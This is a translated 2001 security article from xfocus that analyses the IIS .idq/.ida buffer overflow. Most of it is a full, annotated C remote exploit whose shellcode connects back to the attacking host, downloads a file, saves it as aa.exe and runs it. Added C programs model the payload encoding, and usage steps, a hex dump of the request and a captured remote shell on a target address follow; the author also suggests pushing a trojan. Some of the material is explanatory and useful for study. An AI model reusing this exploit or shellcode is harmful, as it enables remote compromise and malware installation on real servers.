[Analysis] Analysis of the .idq.ida overflow attack



Created: 2001-07-01

Article type: original

Source:

http://www.xfocus.org

Submitted by:

ISNO (isno_at_sina.com)

Analysis of the .idq / .ida overflow attack

ISNO (isno@xfocus.org)

The IIS .idq/.ida overflow vulnerability was published quite a while ago, but because it is so hard to exploit, no working attack program appeared for a long time. Even eEye, who discovered the vulnerability, did not release an exploit: the data you send is expanded into wide characters, which makes the overwritten return address hard to control. eEye's suggested method puts a large run of NOPs in front of the shellcode so that the shellcode ends up at an address of the form 0x004x00xx, then overwrites RET with a string such as "XX4X", which after expansion becomes XX004X00 and points at the shellcode. That works in theory, but in practice there are problems: you can control the jump but cannot execute the code, since the shellcode bytes are expanded in the same way, and 0x004x00xx differs from machine to machine, which makes a reliable exploit hard to write.

Yesterday I finally saw a working attack program published. At first I did not look at it carefully and thought it was a hoax. Later I traced it with SoftICE and asked Yuan Ge, and then I understood it. This exploit is very good: it uses a clever way of avoiding the wide-character expansion, so the jump address can be controlled at will, and with his method one can write a more complete exploit.

The shellcode of this program is relatively simple: it connects to a specified port on a specified host to receive data, saves it as aa.exe, then runs aa.exe. Unlike IISHACK for the earlier .htr overflow, it cannot actively request data; it can only wait for the host to send it. So you cannot use it to download a program of your choosing; instead, the attack program on the attacking side must wait for the connection and then push the data to the attacked host.

I changed this program so that it can attack the Chinese version of IIS 5. Since I have to spend the next few days testing, I have no time to write a new program; that will have to wait until the tests are done. Below is my modified .idq exploit, with some detailed annotations:

------------------------------- idq.c -------------------------------

/*
 * IIS 5.0 .idq overrun remote exploit
 * programmed by hsj: 01.06.21
 *
 * code flow:
 *   overrun -> jmp or call ebx -> jmp 8 ->
 *   check shellcode addr and jump to there ->
 *   shellcode -> make back channel -> download & exec code
 */

/*
 * Modified by isno.
 * Attacks the Chinese version of Win2K IIS 5.0 SP0 successfully.
 * Compiled on Red Hat 6.2.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#define RET 0x77e4ac97          /* jmp or call ebx */
/* This is the address of a JMP EBX in the Chinese version of Win2K (no SP). */

#define GMHANDLEA 0x77E756DB    /* address of GetModuleHandleA */
#define GPADDRESS 0x77E7564B    /* address of GetProcAddress */
/* Addresses of GetModuleHandleA and GetProcAddress in the Chinese version. */
/* These two API addresses are fixed for a given build, so they are simply
   hard-coded; it would be more portable to have the shellcode search for them. */

#define GMHANDLEA_OFFSET 24     /* offset of the GetModuleHandleA address inside the shellcode */
#define GPADDRESS_OFFSET 61     /* same, for GetProcAddress */

#define OFFSET 234              /* exception handler offset */
/*
 * The author chose to overwrite the SEH record, which avoids the errors
 * caused by overwriting certain parameters; in my tests, though, it came
 * to the same thing.
 */

#define NOP 0x41

#define MASKING 1
#if MASKING
#define PORTMASK 0x4141
#define ADDRMASK 0x41414141
#define PORTMASK_OFFSET 128
#define ADDRMASK_OFFSET 133
#endif
/* Some masking is applied so that the address or port does not put a \0
   byte into the shellcode (a port number, for instance, can contain \0). */

#define PORT 555
/* The port the shellcode connects back to. Don't use 80, since 80 is
   usually already in use. */

#define ADDR "111.111.111.111"
/*
 * !!! NOTE: this is the place you must change !!!
 * It is the address of the host you launch the attack from, i.e. the host
 * the attack program runs on.
 */

#define PORT_OFFSET 115
#define ADDR_OFFSET 120
/* offsets of the port and the address inside the shellcode */

unsigned char shellcode[] =
    "\x5b\x33\xc0\x40\x40\xc1\xe0\x09\x2b\xe0\x33\xc9\x41\x41\x33\xc0"   /* pop ebx (-> name strings); sub esp,0x400; ecx = 2 DLLs */
    "\x51\x53\x83\xc3\x06\x88\x03\xb8\xdd\xcc\xbb\xaa\xff\xd0\x59\x50"   /* NUL-terminate the DLL name, GetModuleHandleA (addr patched at 24), push handle */
    "\x43\xe2\xeb\x33\xed\x8b\xf3\x5f\x33\xc0\x80\x3b\x2e\x75\x1e\x88"   /* loop over both DLLs; edi = ws2_32 handle; walk the '.'-separated API names */
    "\x03\x83\xfd\x04\x75\x04\x8b\x7c\x24\x10\x56\x57\xb8\xdd\xcc\xbb"   /* after 4 names switch edi to the msvcrt handle; GetProcAddress (addr patched at 61) */
    "\xaa\xff\xd0\x50\x8d\x73\x01\x45\x83\xfd\x08\x74\x03\x43\xeb\xd8"   /* push each resolved address; 8 APIs in all */
    "\x8d\x74\x24\x20\x33\xc0\x50\x40\x50\x40\x50\x8b\x46\xfc\xff\xd0"   /* esi -> scratch above the API table; socket(AF_INET, SOCK_STREAM, 0) */
    "\x8b\xf8\x33\xc0\x40\x40\x66\x89\x06\xc1\xe0\x03\x50\x56\x57\x66"   /* edi = s; sin_family = AF_INET; push 16, &sockaddr, s */
    "\xc7\x46\x02\xbb\xaa\xc7\x46\x04\x44\x33\x22\x11"                   /* sin_port (patched at 115), sin_addr (patched at 120) */
#if MASKING
    "\x66\x81\x76\x02\x41\x41\x81\x76\x04\x41\x41\x41\x41"               /* xor the masks back out of the port (128) and the address (133) */
#endif
    "\x8b\x46\xf8\xff\xd0\x33\xc0"                                       /* connect() */
    "\xc7\x06\x5c\x61\x61\x2e\xc7\x46\x04\x65\x78\x65\x41\x88\x46\x07"   /* build the file name "\aa.exe" */
    "\x66\xb8\x80\x01\x50\x66\xb8\x01\x81\x50\x56\x8b\x46\xec\xff\xd0"   /* _open(name, O_WRONLY|O_CREAT|O_BINARY, 0600) */
    "\x8b\xd8\x33\xc0\x50\x40\xc1\xe0\x09\x50\x8d\x4e\x08\x51\x57\x8b"   /* ebx = fd; recv(s, buf, 0x200, 0) */
    "\x46\xf4\xff\xd0\x85\xc0\x7e\x0e\x50\x8d\x4e\x08\x51\x53\x8b\x46"   /* while recv() > 0: _write(fd, buf, n) */
    "\xe8\xff\xd0\x90\xeb\xdc\x53\x8b\x46\xe4\xff\xd0\x57\x8b\x46\xf0"   /* loop back; then _close(fd); closesocket(s) */
    "\xff\xd0\x33\xc0\x50\x56\x56\x8b\x46\xe0\xff\xd0\x33\xc0\xff\xd0";  /* _execl(name, name, NULL); then call 0 to crash out */

/* The shellcode connects back to the attacker and downloads the program;
   the program has to be on the attacking host. */

unsigned char storage[] =
    "\xeb\x02"                  /* jmp +2: over the next jmp, to the call */
    "\xeb\x4e"                  /* jmp +0x4e: to the start of the shellcode */
    "\xe8\xf9\xff\xff\xff"      /* call -7: back to the jmp above, pushing the
                                   address of the strings below as the "return" */
    "msvcrt.ws2_32.socket.connect.recv.closesocket."
    "_open._write._close._execl.";

/* This sits in front of the shellcode; it jumps to the shellcode proper and
   lets it find the DLL and API name strings (the shellcode's first pop ebx). */

unsigned char forwardjump[] =
    "%u08eb";

/* This is the JMP 08h that overwrites the exception record; it jumps over the
   handler pointer to the code that in turn jumps to the shellcode. */

/*
 * The author puts a %u in front, which sidesteps the expansion to wide
 * characters. This trick is wonderful! For how IIS processes %u, see the
 * disassembly Yuan Ge posted on bbs.nsfocus.com. The return address and the
 * jump-to-shellcode code that follow are handled the same way.
 */

unsigned char jump_to_shell[] =
    "%uC033%uB866%u031F%u0340%u8BD8%u8B03"
    "%u6840%uDB33%u30B3%uC303%uE0FF";

/*
 * Jumps to the shellcode; I won't explain it here, look at it yourself if you
 * are interested. Note that each pair of bytes is swapped: %uC033 becomes
 * \x33\xc0 after conversion.
 */

unsigned int resolve(char *name)
{
    struct hostent *he;
    unsigned int ip;

    if ((ip = inet_addr(name)) == (-1))
    {
        if ((he = gethostbyname(name)) == 0)
            return 0;
        memcpy(&ip, he->h_addr, 4);
    }
    return ip;
}

/* host name -> ip */

int make_connection(char *address, int port)
{
    struct sockaddr_in server, target;
    int s, i, bf;
    socklen_t optlen;
    fd_set wd;
    struct timeval tv;

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
        return -1;
    memset((char *)&server, 0, sizeof(server));   /* not otherwise used */
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = htonl(INADDR_ANY);
    server.sin_port = 0;
    target.sin_family = AF_INET;
    target.sin_addr.s_addr = resolve(address);
    if (target.sin_addr.s_addr == 0)
    {
        close(s);
        return -2;
    }
    target.sin_port = htons(port);
    /* non-blocking connect with a 10 second timeout */
    bf = 1;
    ioctl(s, FIONBIO, &bf);
    tv.tv_sec = 10;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s, &wd);
    connect(s, (struct sockaddr *)&target, sizeof(target));
    if ((i = select(s + 1, 0, &wd, 0, &tv)) == (-1))
    {
        close(s);
        return -3;
    }
    if (i == 0)
    {
        close(s);
        return -4;
    }
    optlen = sizeof(int);
    getsockopt(s, SOL_SOCKET, SO_ERROR, &bf, &optlen);
    if ((bf != 0) || (optlen != sizeof(int)))
    {
        close(s);
        errno = bf;
        return -5;
    }
    ioctl(s, FIONBIO, &bf);     /* bf is 0 here: back to blocking mode */
    return s;
}

/* The function above connects to the target host. */

/*
 * The function below is important: it listens on the port defined above
 * (I used 555). Once a host connects, this process sends a local program
 * over; which program is of course specified at run time.
 */

int get_connection(int port)
{
    struct sockaddr_in local, remote;
    int lsock, csock, reuse_addr;
    socklen_t len;

    lsock = socket(AF_INET, SOCK_STREAM, 0);
    if (lsock < 0)
    {
        perror("socket");
        exit(1);
    }
    reuse_addr = 1;
    if (setsockopt(lsock, SOL_SOCKET, SO_REUSEADDR, (char *)&reuse_addr, sizeof(reuse_addr)) < 0)
    {
        perror("setsockopt");
        close(lsock);
        exit(1);
    }
    memset((char *)&local, 0, sizeof(local));
    local.sin_family = AF_INET;
    local.sin_port = htons(port);
    local.sin_addr.s_addr = htonl(INADDR_ANY);
    if (bind(lsock, (struct sockaddr *)&local, sizeof(local)) < 0)
    {
        perror("bind");
        close(lsock);
        exit(1);
    }
    if (listen(lsock, 1) < 0)
    {
        perror("listen");
        close(lsock);
        exit(1);
    }
retry:
    len = sizeof(remote);
    csock = accept(lsock, (struct sockaddr *)&remote, &len);
    if (csock < 0)
    {
        if (errno != EINTR)
        {
            perror("accept");
            close(lsock);
            exit(1);
        }
        else
            goto retry;
    }
    close(lsock);
    return csock;
}

int main(int argc, char *argv[])
{
    int i, j, s, pid;
    unsigned int cb;
    unsigned short port;
    char *p, buf[512], buf2[512], buf3[2048];
    FILE *fp;

    if (argc != 3)
    {
        printf("usage: $ %s ip file\n", argv[0]);
        return -1;
    }
    if ((fp = fopen(argv[2], "rb")) == 0)
        return -2;
    if (!(cb = resolve(ADDR)))
        return -3;
    if ((pid = fork()) < 0)
        return -4;
    /*
     * Fork into two processes: one builds and sends the overflow string,
     * the other listens on the specified port and waits to send the data.
     */
    if (pid)
    {
        fclose(fp);
        s = make_connection(argv[1], 80);
        if (s < 0)
        {
            printf("connect error: [%d].\n", s);
            kill(pid, SIGTERM);
            return -5;
        }
        j = strlen((char *)shellcode);
        /* patch the API addresses, the port and the address into the shellcode */
        *(unsigned int *)&shellcode[GMHANDLEA_OFFSET] = GMHANDLEA;
        *(unsigned int *)&shellcode[GPADDRESS_OFFSET] = GPADDRESS;
        port = htons(PORT);
#if MASKING
        port ^= PORTMASK;
        cb ^= ADDRMASK;
        *(unsigned short *)&shellcode[PORTMASK_OFFSET] = PORTMASK;
        *(unsigned int *)&shellcode[ADDRMASK_OFFSET] = ADDRMASK;
#endif
        *(unsigned short *)&shellcode[PORT_OFFSET] = port;
        *(unsigned int *)&shellcode[ADDR_OFFSET] = cb;
        /* the patched shellcode must not contain LF, CR or ':' */
        for (i = 0; i < j; i++)
        {
            if ((shellcode[i] == 0x0a) ||
                (shellcode[i] == 0x0d) || (shellcode[i] == 0x3a))
                break;
        }
        if (i != j)
        {
            printf("bad portno or ip address...\n");
            close(s);
            kill(pid, SIGTERM);
            return -6;
        }
        /* query string: filler, JMP 08, filler, RET as two %u words, filler, jump stub */
        memset(buf, 1, sizeof(buf));
        p = &buf[OFFSET - 2];
        sprintf(p, "%s", forwardjump);
        p += strlen((char *)forwardjump);
        *p++ = 1;
        *p++ = '%';
        *p++ = 'u';
        sprintf(p, "%04x", (RET >> 0) & 0xffff);
        p += 4;
        *p++ = '%';
        *p++ = 'u';
        sprintf(p, "%04x", (RET >> 16) & 0xffff);
        p += 4;
        *p++ = 1;
        sprintf(p, "%s", jump_to_shell);
        /* Shell: header: NOPs, then the name strings, then the shellcode */
        memset(buf2, NOP, sizeof(buf2));
        memcpy(&buf2[sizeof(buf2) - strlen((char *)shellcode) - strlen((char *)storage) - 1],
               storage, strlen((char *)storage));
        memcpy(&buf2[sizeof(buf2) - strlen((char *)shellcode) - 1],
               shellcode, strlen((char *)shellcode));
        buf2[sizeof(buf2) - 1] = 0;
        sprintf(buf3, "GET /a.idq?%s=a HTTP/1.0\r\nShell: %s\r\n\r\n", buf, buf2);
        /*
         * The above builds the overflow string. Once expanded and copied into
         * IIS's stack it looks like this:
         *
         *   ..............      | exception chain | handler pointer | ..............
         *   0100 0100 0100 ...  | EB08 0100       | 97AC E477       | 0100 33C0 ...
         *                       | JMP 08h         | JMP EBX         | jump to shellcode
         */
        write(s, buf3, strlen(buf3));
        printf("---");
        for (i = 0; i < strlen(buf3); i++)
        {
            if ((i % 16) == 0)
                printf("\n");
            printf("%02X ", buf3[i] & 0xff);
        }
        printf("\n---\n");
        wait(0);
        sleep(1);
        shutdown(s, 2);
        close(s);
        printf("done.\n");
    }
    /* The child process below waits for the connection back, then opens the
       specified file and sends it. */
    else
    {
        s = get_connection(PORT);
        j = 0;
        while ((i = fread(buf, 1, sizeof(buf), fp)))
        {
            write(s, buf, i);
            j += i;
            printf(".");
            fflush(stdout);
        }
        fclose(fp);
        printf("\n%d bytes send...\n", j);
        shutdown(s, 2);
        close(s);
    }
    return 0;
}

------------------------- idq.c ----- cut here -------------------------
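To make the wide-character argument concrete, here is an added example; it is not part of the original article or of hsj's idq.c. It rebuilds the query-string half of the request exactly as main() above does, runs it through a simplified model of the server-side expansion, and then reads the SEH record and the JMP 08 landing point back out of the expanded image. The model is an assumption: an ASCII byte becomes the byte followed by 00, and %uXXXX becomes the 16-bit value XXXX stored little-endian; bytes of 0x80 and above are rejected rather than modelled, since their expansion depends on the code page and the exploit never sends any in the query string. RET, OFFSET, forwardjump and jump_to_shell are the values from the listing.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define RET    0x77e4ac97u   /* jmp/call ebx, Chinese Win2K build (value from the page) */
#define OFFSET 234           /* distance to the exception-handler record (from the page) */

static const char forwardjump[]   = "%u08eb";   /* jmp short +8 */
static const char jump_to_shell[] =             /* stub that locates the Shell: header */
    "%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF";

struct layout {
    size_t query_len;     /* length of the query string as sent */
    size_t image_len;     /* length after expansion */
    size_t seh;           /* expanded offset of the SEH record */
    unsigned handler;     /* handler pointer read back from the image */
    size_t landing;       /* where the JMP 08 in the record's "next" field goes */
    int ok;               /* 1 if the landing bytes are xor eax,eax */
};

/* Builds the query the way main() in idq.c does: OFFSET-2 bytes of 0x01,
 * JMP 08, a 0x01 filler, RET as two %u words (low word first), another
 * filler, then the stub.  Returns the string length (0 if buf is too small). */
size_t build_query(char *buf, size_t len)
{
    char *p;
    if (len < 512)
        return 0;
    memset(buf, 1, len);
    p = &buf[OFFSET - 2];
    p += sprintf(p, "%s", forwardjump);
    *p++ = 1;
    p += sprintf(p, "%%u%04x", (RET >> 0) & 0xffff);
    p += sprintf(p, "%%u%04x", (RET >> 16) & 0xffff);
    *p++ = 1;
    p += sprintf(p, "%s", jump_to_shell);
    return (size_t)(p - buf);
}

/* Parses four hex digits; returns 0 on anything else. */
static int hex4(const char *s, unsigned *v)
{
    int i, c;
    *v = 0;
    for (i = 0; i < 4; i++) {
        c = tolower((unsigned char)s[i]);
        if (!isxdigit(c))
            return 0;
        *v = (*v << 4) | (unsigned)(isdigit(c) ? c - '0' : c - 'a' + 10);
    }
    return 1;
}

/* Assumed model of the expansion (see the lead-in).  Returns the image
 * length, 0 if the query contains something the model does not cover. */
size_t expand_query(const char *q, size_t qlen, unsigned char *out, size_t outlen)
{
    size_t i = 0, o = 0;
    unsigned v;
    while (i < qlen) {
        if (o + 2 > outlen)
            return 0;
        if (q[i] == '%' && i + 6 <= qlen && q[i + 1] == 'u' && hex4(q + i + 2, &v)) {
            out[o++] = (unsigned char)(v & 0xff);   /* %uac97 -> 97 ac */
            out[o++] = (unsigned char)(v >> 8);
            i += 6;
        } else if ((unsigned char)q[i] < 0x80) {
            out[o++] = (unsigned char)q[i];         /* 0x01 -> 01 00 */
            out[o++] = 0;
            i++;
        } else {
            return 0;
        }
    }
    return o;
}

/* Builds, expands and reads the image back the way the CPU does once the
 * exception fires: the record's "next" field holds EB 08, the handler field
 * holds RET, and the JMP EBX at RET returns to the EB 08, which skips the
 * 8 bytes of filler plus handler pointer and lands on the stub. */
struct layout analyse(void)
{
    struct layout r;
    char q[512];
    unsigned char img[1024];
    memset(&r, 0, sizeof r);
    r.query_len = build_query(q, sizeof q);
    r.image_len = expand_query(q, r.query_len, img, sizeof img);
    r.seh = 2 * (OFFSET - 2);
    if (r.image_len < r.seh + 12 || img[r.seh] != 0xeb)
        return r;
    r.handler = img[r.seh + 4] | img[r.seh + 5] << 8 | img[r.seh + 6] << 16
              | (unsigned)img[r.seh + 7] << 24;
    r.landing = r.seh + 2 + img[r.seh + 1];      /* short jmp: next ip + rel8 */
    r.ok = img[r.landing] == 0x33 && img[r.landing + 1] == 0xc0;
    return r;
}

int main(void)
{
    struct layout r = analyse();
    char q[512];
    unsigned char img[1024];
    size_t i, k;
    build_query(q, sizeof q);
    expand_query(q, r.query_len, img, sizeof img);
    printf("query %zu bytes, expanded %zu bytes, SEH record at %zu\n",
           r.query_len, r.image_len, r.seh);
    for (k = 0, i = r.seh - 4; i < r.seh + 20; i++, k++)   /* dump around the record */
        printf("%02x%c", img[i], k % 8 == 7 ? '\n' : ' ');
    printf("handler 0x%08x, JMP 08 lands at %zu: %s\n", r.handler, r.landing,
           r.ok ? "xor eax,eax (stub reached)" : "mismatch");
    return r.ok ? 0 : 1;
}
```

The dump shows why the %u trick matters: the 0x01 filler comes out as 01 00 pairs, so the record sits at 2*(OFFSET-2) in the expanded buffer, while the %u sequences come out as the raw word values, so EB 08, the handler address and the 33 C0 of the stub land exactly where the diagram in the listing puts them.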

The whole attack proceeds like this:

   attacking host                                   attacked host

1. send the overflow string with the shellcode
   ----------------------------------------------->
                                                    2. overflow; the shellcode runs
3. listen on port 555, waiting for a connection
                                                    4. connect to port 555 on the attacking host
   <-----------------------------------------------
5. send the file data
   ----------------------------------------------->
                                                    6. save the received data as aa.exe and execute it
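The masking step (PORTMASK/ADDRMASK in the listing) deserves a closer look, so here is a second added example, again not from the article or from idq.c. It encodes the attacker's port and address into the six bytes the shellcode's sockaddr_in needs, applies the XOR masks the way main() does, undoes them the way the shellcode's two XOR instructions do on the target, and scans for the bytes the request must not contain. The masks and the bad-byte set are the page's; the sample ports and addresses are constructed for the demonstration, and the third case shows why the exploit keeps its scan even with masking on: a port of 0x4141 masks to 0x0000.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define PORTMASK 0x4141         /* masks as in idq.c */
#define ADDRMASK 0x41414141u

/* Bytes idq.c refuses to send inside the shellcode: a NUL ends the string
 * copy, CR/LF end the HTTP header line, and ':' is the header separator. */
static int is_bad_byte(unsigned char b)
{
    return b == 0x00 || b == 0x0a || b == 0x0d || b == 0x3a;
}

/* The six bytes the shellcode drops into its sockaddr_in (sin_port, then
 * sin_addr, both network order), XORed with the masks when masked != 0.
 * Returns 0 on a malformed address. */
int encode_target(uint16_t port, const char *ip, int masked, unsigned char out[6])
{
    struct in_addr a;
    uint16_t p;
    uint32_t ad;
    if (inet_pton(AF_INET, ip, &a) != 1)
        return 0;
    p = htons(port);
    ad = a.s_addr;              /* already network order */
    if (masked) {
        p ^= PORTMASK;
        ad ^= ADDRMASK;
    }
    memcpy(out, &p, 2);
    memcpy(out + 2, &ad, 4);
    return 1;
}

/* What "xor word [esi+2],4141h" and "xor dword [esi+4],41414141h" do on the target. */
void unmask_target(unsigned char buf[6])
{
    uint16_t p;
    uint32_t ad;
    memcpy(&p, buf, 2);
    memcpy(&ad, buf + 2, 4);
    p ^= PORTMASK;
    ad ^= ADDRMASK;
    memcpy(buf, &p, 2);
    memcpy(buf + 2, &ad, 4);
}

/* Number of forbidden bytes in the encoding, -1 on a bad address.  idq.c
 * still runs this scan after masking: 0x41 XOR 0x41 is 0x00, so an input
 * byte of 0x41 defeats the mask. */
int bad_byte_count(uint16_t port, const char *ip, int masked)
{
    unsigned char b[6];
    int i, n = 0;
    if (!encode_target(port, ip, masked, b))
        return -1;
    for (i = 0; i < 6; i++)
        n += is_bad_byte(b[i]);
    return n;
}

/* Byte idx (0..5) of the encoding, -1 on a bad address or index. */
int encoded_byte(uint16_t port, const char *ip, int masked, int idx)
{
    unsigned char b[6];
    if (idx < 0 || idx > 5 || !encode_target(port, ip, masked, b))
        return -1;
    return b[idx];
}

/* 1 when unmasking the wire form gives back the raw encoding. */
int roundtrip_ok(uint16_t port, const char *ip)
{
    unsigned char raw[6], wire[6];
    if (!encode_target(port, ip, 0, raw) || !encode_target(port, ip, 1, wire))
        return 0;
    unmask_target(wire);
    return memcmp(raw, wire, 6) == 0;
}

int main(void)
{
    /* constructed sample targets */
    struct { uint16_t port; const char *ip; } t[] = {
        { 555,   "111.111.111.111" },  /* the page's defaults */
        { 13,    "10.0.0.1" },         /* raw form is full of NUL/CR/LF */
        { 16705, "1.2.3.4" },          /* port 0x4141: the mask itself produces NULs */
    };
    size_t k;
    int i;
    for (k = 0; k < sizeof t / sizeof t[0]; k++) {
        unsigned char raw[6], wire[6];
        encode_target(t[k].port, t[k].ip, 0, raw);
        encode_target(t[k].port, t[k].ip, 1, wire);
        printf("%5u %-16s raw:", (unsigned)t[k].port, t[k].ip);
        for (i = 0; i < 6; i++)
            printf(" %02x", raw[i]);
        printf("  wire:");
        for (i = 0; i < 6; i++)
            printf(" %02x", wire[i]);
        printf("  bad raw=%d wire=%d roundtrip=%d\n",
               bad_byte_count(t[k].port, t[k].ip, 0),
               bad_byte_count(t[k].port, t[k].ip, 1),
               roundtrip_ok(t[k].port, t[k].ip));
    }
    return 0;
}
```

With the page's own defaults the masked port comes out as 43 6A, which is exactly what the hex dump of the real request further down shows at that position in the shellcode.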

Below is a demonstration of how it is used.

First compile idq.c on a Linux host: gcc -o idq idq.c

!!! Note: you must first change the #define ADDR "111.111.111.111" in the
program to the IP address of the Linux host !!!

Then upload an ncx99.exe into the same directory on that host:

bash# ls -al
total 90
drwxrwxrwt   7 root     root         1024 Aug 30 05:25 .
drwxr-xr-x  17 root     root         1024 Aug 28 15:47 ..
drwxrwxrwt   2 xfs      xfs          1024 May 14 03:03 .font-unix
-rwxr-xr-x   1 root     root        18526 Aug 30 05:25 idq
-rw-r--r--   1 root     root         8149 Aug 30 05:25 idq.c
-rw-rw-rw-   1 root     root        59392 Aug 17  1999 ncx99.exe

Suppose the target is 61.135.19.222; then run:

bash# ./idq 61.135.19.222 ncx99.exe
---

47 45 54 20 2F 61 2E 69 64 71 3F 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 25 75 30 38 65 62 01 25 75 61 63 39 37
25 75 37 37 65 34 01 25 75 43 30 33 33 25 75 42
38 36 36 25 75 30 33 31 46 25 75 30 33 34 30 25
75 38 42 44 38 25 75 38 42 30 33 25 75 36 38 34
30 25 75 44 42 33 33 25 75 33 30 42 33 25 75 43
33 30 33 25 75 45 30 46 46 3D 61 20 48 54 54 50
2F 31 2E 30 0D 0A 53 68 65 6C 6C 3A 20 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 EB 02 EB 4E E8 F9
FF FF FF 6D 73 76 63 72 74 2E 77 73 32 5F 33 32
2E 73 6F 63 6B 65 74 2E 63 6F 6E 6E 65 63 74 2E
72 65 63 76 2E 63 6C 6F 73 65 73 6F 63 6B 65 74
2E 5F 6F 70 65 6E 2E 5F 77 72 69 74 65 2E 5F 63
6C 6F 73 65 2E 5F 65 78 65 63 6C 2E 5B 33 C0 40
40 C1 E0 09 2B E0 33 C9 41 41 33 C0 51 53 83 C3
06 88 03 B8 DB 56 E7 77 FF D0 59 50 43 E2 EB 33
ED 8B F3 5F 33 C0 80 3B 2E 75 1E 88 03 83 FD 04
75 04 8B 7C 24 10 56 57 B8 4B 56 E7 77 FF D0 50
8D 73 01 45 83 FD 08 74 03 43 EB D8 8D 74 24 20
33 C0 50 40 50 40 50 8B 46 FC FF D0 8B F8 33 C0
40 40 66 89 06 C1 E0 03 50 56 57 66 C7 46 02 43
6A C7 46 04 8B 2D 63 51 66 81 76 02 41 41 81 76
04 41 41 41 41 8B 46 F8 FF D0 33 C0 C7 06 5C 61
61 2E C7 46 04 65 78 65 41 88 46 07 66 B8 80 01
50 66 B8 01 81 50 56 8B 46 EC FF D0 8B D8 33 C0
50 40 C1 E0 09 50 8D 4E 08 51 57 8B 46 F4 FF D0
85 C0 7E 0E 50 8D 4E 08 51 53 8B 46 E8 FF D0 90
EB DC 53 8B 46 E4 FF D0 57 8B 46 F0 FF D0 33 C0
50 56 56 8B 46 E0 FF D0 33 C0 FF D0 0D 0A 0D 0A
---

..........................................................................
..................................
59392 bytes send...
done.

Now the file has been transferred and run. Wait a few seconds, and you can connect to it:

bash# nc -vv 61.135.19.222 99
61.135.19.222: inverse host lookup failed: Unknown host
(UNKNOWN)[61.135.19.222] 99 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1998 Microsoft Corp.

C:\WINNT\system32>cd \
cd \

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is CC31-6B3C

 Directory of C:\

1997-01-11  16:54             297 1.pl
2001-07-01  03:08          59,392 aa.exe
1997-01-06  16:44      <DIR>          Documents and Settings
2001-06-30  16:21      <DIR>          Download
2001-05-02  19:17      <DIR>          inetpub
2001-05-21  16:35      <DIR>          MP3
2001-05-02  21:48      <DIR>          mysql
2001-05-02  21:45      <DIR>          perl
2001-05-02  21:57      <DIR>          PHP
2001-06-30  16:24      <DIR>          Program Files
2001-06-22  01:47      <DIR>          Tool
2001-06-30  16:23      <DIR>          Winnt
.........
.........
.........
              28 file(s)        383,912 bytes
              13 dir(s)    353,680,384 bytes free

C:\>exit
 sent 13, rcvd 2326
bash#

You can also push over a Glacier (冰河) server instead, as you like!

I feel a bit lost, because the vulnerability was not found by me and the attack program was not written by me; I can only follow in the footsteps of the masters, oh well... I need to keep studying.

Welcome to visit

http://www.xfocus.org

Please keep the article intact when reprinting!

When reprinting please cite the original address: https://www.9cbs.com/read-40856.html
